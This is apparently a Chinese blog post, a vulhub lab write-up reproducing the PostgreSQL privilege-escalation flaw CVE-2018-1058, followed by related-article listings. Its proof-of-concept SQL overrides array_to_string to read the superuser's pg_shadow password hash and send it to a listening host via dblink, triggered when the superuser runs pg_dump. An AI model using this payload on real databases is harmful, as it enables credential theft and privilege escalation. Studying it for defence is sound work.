CVE-2018-1058 PostgreSQL 提权漏洞

最新推荐文章于 2023-05-17 11:11:57 发布
最新推荐文章于 2023-05-17 11:11:57 发布
阅读量825 收藏
点赞数
分类专栏: 漏洞 文章标签: postgresql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121848742
版权
该博客详细介绍了PostgreSQL数据库的一个逻辑错误漏洞,影响9.3到10版本。普通用户能够注入危险代码,当超级用户执行特定操作时触发这些代码,可能导致敏感信息泄露。通过提供漏洞复现步骤,包括环境准备、普通用户注入代码和超级用户触发后门的过程,展示了漏洞的利用方法。
摘要由CSDN通过智能技术生成

漏洞原理

PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。
​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息

影响版本:PostgreSQL < 10

漏洞复现

环境准备

打开漏洞存放路径:cd /home/guiltyfet/vulhub/postgres/CVE-2018-1058

docker-compose up -d

docker ps

注意端口下面要用到:环境启动后,将在本地开启PG默认的5432端口。
在这里插入图片描述

另起一个终端
先通过普通用户vulhub:vulhub的身份登录

psql --host 192.168.144.1 --username vulhub
输入口令:vulhub

在这里插入图片描述
注意:POC里面的端口和IP地址
查看本机ip和端口

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.144.1 port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

在这里插入图片描述
退出exit

监听192.168.144.1的5432端口

在这里插入图片描述然后我在192.168.144.1上监听5432端口,等待超级用户触发我们留下的这个“后门”,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。执行上述命令的同时,“后门”已被触发192.168.144.1机器上已收到敏感信息:

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql及postgresql漏洞修复包
02-02
mysql-connector-java-8.0.19版本修复包:mysql-connector-java-8.0.27.jar postgresql--42.1.4版本修复包:postgresql-42.2.26.jar
CVE-2018-1058简介
HighGO
04-04 1330
CVE-2018-1058描述了一个用户在不同模式下创建的一些名字很像的对象,是怎么改变其他用户的查询行为而且导致意料之外或者有害的行为的。它主要描述了这个问题以及在PostgreSQL中减轻这些问题的影响的办法。 什么是CVE-2018-1058PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所...
PostgreSQL 提权漏洞复现(CVE-2018-1058)
又菜又爱倒腾的博客
10-29 2701
#PostgreSQL 提权漏洞(CVE-2018-1058)# 一、漏洞简介 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 二、漏洞影响 影响版本 9.3到10 三、产生原因 PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所有的对象都会被创建到这个模式下。所以SELECT * FROM a;
PostgreSQL 提权漏洞 CVE-2018-1058 漏洞复现
ADummy的博客
03-07 664
PostgreSQL 提权漏洞CVE-2018-1058) by ADummy 0x00利用路线 ​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 影响版本 PostgreSQL < 10 0x02漏洞复现 我们先通过普通用户vulhub:vulhub
CVE-2018-1058(远程代码执行漏洞)vulhub复现
qq_52279315的博客
05-17 274
vulhub靶场复现【postgresql
cve-search
03-04
3. **数据存储**:为了方便快速检索,"cve-search" 可能会将解析后的数据存储在数据库中,如SQLite、MySQL或PostgreSQL。Python的sqlite3库可用于轻量级数据库操作,而SQLAlchemy可以处理更复杂的ORM(对象关系映射...
CVE-Search:CVE-Search(名称仍为字母),是一种机器学习工具,致力于检测Twitter,Github等社交网络中的漏洞利用或概念证明。 它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念证明或仅仅是有关漏洞的信息
02-03
它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念证明或仅仅是有关漏洞的信息。 入门 # Run the application $ git clone ...
0x18.第十八课 MetaSploit对cve-2019-0708的检测.pdf
06-24
CVE-2019-0708是一个严重的远程代码执行漏洞,影响了多个版本的Windows操作系统,包括Windows 2003、Windows 2008、Windows 2008 R2以及Windows XP等。该漏洞允许攻击者通过未授权的身份验证过程,在目标系统的远程...
PostgreSQL CVE-2018-1058(search_path) - 暨数据库的那些陷阱与攻防指南
weixin_34056162的博客
04-18 315
标签 PostgreSQL , search_path , 陷阱 , overload function 背景 PostgreSQL 元宵节对各个版本发布了小版本补丁,主要是解决一个search_path的功能,被攻击者利用来设置陷阱的问题。 https://git.postgresql.org/gitweb/?p=postgresql.git&am...
PostgreSQL CVE-2018-1058 问题?
将臣三代的博客
05-05 483
简 介 在之前的版本中,PgSql 在不同表空间下新建名称相似的对象时,会对其他用户查询该对象时造成不可预知的错误就想特洛伊木马病毒似的。 什么是 CVE-2018-1058? 在PgSql 7.3版本中介绍了”schemas”,在不同的命名空间允许用户创建对象或者函数等。 Catalog 和 Schema :可理解为一个容器或者数据库对象命名空间,解决命名冲突问题* 1个数据库----...
【vulhub】PostGresql远程代码执行漏洞复现(CVE-2018-1058)
errorr0
08-05 995
CVE-2018-1058
PostgreSQL 提权漏洞CVE-2018-1058
黑白的博客
12-27 1302
声明 好好学习,天天向上 漏洞描述 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 影响范围 9.3到10 复现过程 这里使用9.6.7版本 使用vulhub /app/vulhub-master/postgres/CVE-2018-1058 使用docker启动 docker-compose build docker-compose up -d 先通过普通用户vulhub:vulhub
内网渗透-权限提升
weixin_60329395的博客
08-26 1306
权限提升流程:信息收集-补丁筛选-利用MSF或特定EXP-西瓜到手漏洞库推荐:Vulmap、Wes、WindowsVulnScanwindows-exp-suggester在17年后未更新,不再推荐Vulmap是PowerShell脚本,使用最简单,但web提权往往只能有cmd窗口,不一定有PowerShell环境,导致该项目对Windows系统不友好Wes和WindowsVulnScan是python脚本,可以不借助PowerShell操作,更适用于web提权。...
权限提升-MSSQL&PostgreSQL
m0_65336233的博客
12-06 740
数据权限提升知识
P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058
在下小黄的博客
05-08 912
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月29日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、Vulhub靶机 PostgreSQL 提权漏洞Vulhub 复现漏洞原理环境准备漏洞复现 Vulhub 复现 PostgreSQL 提权漏洞 漏洞原理 Po
Linux kernel(CVE-2018-17182)提权漏洞复现
最新发布
06-12
为了避免对网络安全造成不必要的威胁,我无法提供具体的漏洞复现步骤。但是,我可以简单地描述一下CVE-2018-17182漏洞的一般性质和可能的攻击方式。 CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核内存中的关键数据结构,以此来控制系统的行为。 攻击者可以通过构造恶意的程序或者利用已存在的软件漏洞来利用该漏洞。因此,为了保护系统的安全,我们应该尽可能保持系统和软件的更新,并采取一系列的安全措施,例如限制用户的权限、使用安全的密码策略等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值